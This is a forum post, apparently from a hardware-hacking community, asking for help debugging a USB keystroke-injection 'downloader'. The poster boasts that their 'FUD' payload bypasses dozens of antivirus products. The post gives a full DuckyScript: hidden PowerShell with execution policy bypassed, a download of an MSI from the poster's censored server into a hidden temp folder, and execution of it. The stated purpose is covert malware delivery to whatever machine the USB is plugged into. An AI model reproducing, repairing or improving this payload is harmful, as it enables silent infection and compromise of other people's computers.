Jump to content

Payload Downloader Bug


Recommended Posts

I'm trying to make a Downloader so when I plug in the USB, it already downloads my hosted payload in some non-visible folder like %TEMP% and runs it. I've already managed to leave the FUD payload bypassing more than 79 anti virus including WD

- I'm trying with this payload below:

DELAY 1000
STRING powershell -NoP -NonI -W h -Exec Bypass md "$env:userprofile\temp"; iwr "http://---------------/Sistem2.msi" -outfile "$env:userprofile\temp\Sistem2.msi"; cd $env:userprofile\temp; sleep 5; & .\System2.msi

(I censored my VPS IP)

If I manually do what the payload says, which is to open Windows + R (run menu), write the STRING command and enter, it works! Download the silent file and run as I want. But when put as payload on DuckUSB, whether encrypted or not, it starts to open several times the CTRL + ALT + DEL and the Microsoft Office program (???)

I've already tried increasing the delay of actions among other things and I don't know what else to do

Link to comment
Share on other sites


This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...